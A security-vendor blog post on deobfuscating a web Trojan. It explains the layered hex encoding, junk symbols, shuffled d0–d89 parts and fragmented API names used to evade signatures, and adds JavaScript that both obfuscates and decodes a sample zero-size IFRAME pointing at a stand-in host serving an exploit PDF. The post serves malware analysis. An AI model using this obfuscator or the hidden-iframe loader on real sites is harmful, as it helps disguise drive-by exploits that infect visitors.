Sharing the Experience of Deobfuscating a Trojan

Thanks to the Websense® ThreatSeeker® Network, we discovered another interesting case involving a malicious Web Trojan and analyzed it. Let’s share our deobfuscation experience.
 
The first step was to identify the location of the malicious code, shown in the red pane of the following image. Then we deobfuscated the code.

Here are some interesting details that we uncovered about the code:

1.   Each character of the original code was first converted to its decimal character code (the numeric form a browser can decode as an HTML character reference), and those decimal values were then rewritten in hexadecimal.
2.   A step length of 10 characters was used: after every 10 hexadecimal digits a random special (non-hexadecimal) symbol was inserted as junk.
3.   The hexadecimal string with its junk symbols was then split into 90 parts, each given a name ID of the form “d0, d1, d2 … d89”; sometimes the parts appeared in order from 0 to 89, and other times completely out of order.
4.   The image below further reveals that the JavaScript commands commonly used for deobfuscation were split into fragments to avoid signature matching: the frequently used names “getAttribute” and “parseInt” were also broken into string pieces that look like a big jumble.

5.   The code displayed in the preceding image turns the obfuscated text back into the original code that a browser can execute. It collects the 90 parts by ID, in order from 0 to 89, into one string, discards the inserted junk symbols, and converts each hexadecimal code back into its character.

6.   The most useful part of the recovered code, shown in the image above, is an IFRAME whose content loads a PDF file that carries the exploit. Before the script gets to that point, it may perform unrelated, useless operations or wrap code in constant conditions (“identical equations”) such as “if (12==022)”, whose outcome is fixed before the script ever runs. Note that in JavaScript a leading zero makes 022 a legacy octal literal equal to decimal 18, so this particular comparison is false and the block it guards never executes; either way the construct is an opaque predicate meant to pad the script and confuse an analyst, not to do useful work.
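The following script, added here as an illustration and not code taken from the Trojan or from Websense, models the whole pipeline of steps 1 to 5 in JavaScript: it encodes a constructed sample payload the way the text describes (decimal codes, hexadecimal, a junk symbol every 10 digits, 90 shuffled parts named d0 to d89) and then recovers it with a decoder that builds its own “getAttribute” and “parseInt” names from fragments. Two hexadecimal digits per character, the junk alphabet, the storage of the parts in element attributes, and the sample IFRAME (pointing at the reserved name example.invalid, which resolves to nothing) are assumptions made for the example. The last function shows the value of the page's “12==022” comparison, written with the modern octal prefix so it parses in strict mode.

```javascript
// Added example modelling the encoding described in steps 1-5 and its decoder.
// Not the Trojan's code and not Websense's code; layout details not stated on
// the page (two hex digits per character, junk alphabet, attribute storage)
// are assumptions.

const STEP = 10;             // step length from step 2
const PARTS = 90;            // number of named parts from step 3
const JUNK = '!@#$%^&*()~';  // assumed set of "special symbols" (no hex digits)

// Step 1: characters -> decimal character codes -> two-digit hexadecimal.
function toDecimalCodes(text) {
  return Array.from(text, ch => ch.charCodeAt(0));
}
function decimalToHex(codes) {
  return codes.map(c => c.toString(16).padStart(2, '0')).join('');
}

// Step 2: insert one random non-hex symbol after every STEP hex digits.
function insertJunk(hex, rand = Math.random) {
  let out = '';
  for (let i = 0; i < hex.length; i += STEP) {
    out += hex.slice(i, i + STEP);
    if (i + STEP < hex.length) out += JUNK[Math.floor(rand() * JUNK.length)];
  }
  return out;
}

// Step 3: cut into PARTS pieces named d0..d89 and shuffle their order, so the
// decoder has to rely on the ids rather than on document order.
function splitIntoParts(s, rand = Math.random) {
  const size = Math.ceil(s.length / PARTS);
  const parts = [];
  for (let i = 0; i < PARTS; i++) {
    parts.push({ id: 'd' + i, value: s.slice(i * size, (i + 1) * size) });
  }
  for (let i = parts.length - 1; i > 0; i--) {   // Fisher-Yates shuffle
    const j = Math.floor(rand() * (i + 1));
    [parts[i], parts[j]] = [parts[j], parts[i]];
  }
  return parts;
}

function obfuscate(text, rand = Math.random) {
  return splitIntoParts(insertJunk(decimalToHex(toDecimalCodes(text)), rand), rand);
}

// Stand-in for the DOM element whose attributes hold the parts (assumption:
// that is why the real script needs getAttribute). Missing ids return null.
function makeCarrier(parts) {
  const attrs = Object.fromEntries(parts.map(p => [p.id, p.value]));
  return { getAttribute: name => (name in attrs ? attrs[name] : null) };
}

// Steps 4-5: the decoder. The API names are assembled from fragments, as the
// page describes, so a signature for "getAttribute" or "parseInt" never
// matches the script text.
function deobfuscate(carrier) {
  const ga = 'get' + 'Attri' + 'bute';
  const pi = 'par' + 'se' + 'Int';
  let joined = '';
  for (let i = 0; i < PARTS; i++) joined += carrier[ga]('d' + i) || '';
  const hex = joined.replace(/[^0-9a-fA-F]/g, '');   // drop the junk symbols
  let text = '';
  for (let i = 0; i < hex.length; i += 2) {
    text += String.fromCharCode(globalThis[pi](hex.slice(i, i + 2), 16));
  }
  return text;
}

// The page's "if (12==022)": with a leading zero 022 is a legacy octal literal
// (decimal 18); 0o22 is the same value in syntax that strict mode accepts.
function opaquePredicate() {
  return 12 == 0o22;   // false: the guarded block would be dead code
}

// Constructed sample payload standing in for the recovered IFRAME; the host
// name example.invalid is reserved and never resolves.
const SAMPLE = '<iframe src="http://example.invalid/x.pdf" width="0" height="0"></iframe>';

function demo() {
  const parts = obfuscate(SAMPLE);           // what the infected page carries
  return deobfuscate(makeCarrier(parts));    // what the browser ends up running
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Running the script prints the sample IFRAME unchanged, which is the check an analyst wants after writing a decoder by hand: the round trip through all five layers loses nothing. In a real case the parts come from a live page, so the same decoder is usually pasted into a browser console (or a sandboxed interpreter) with the real element in place of the carrier object.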
 
We’re happy to share this deobfuscation experience with you.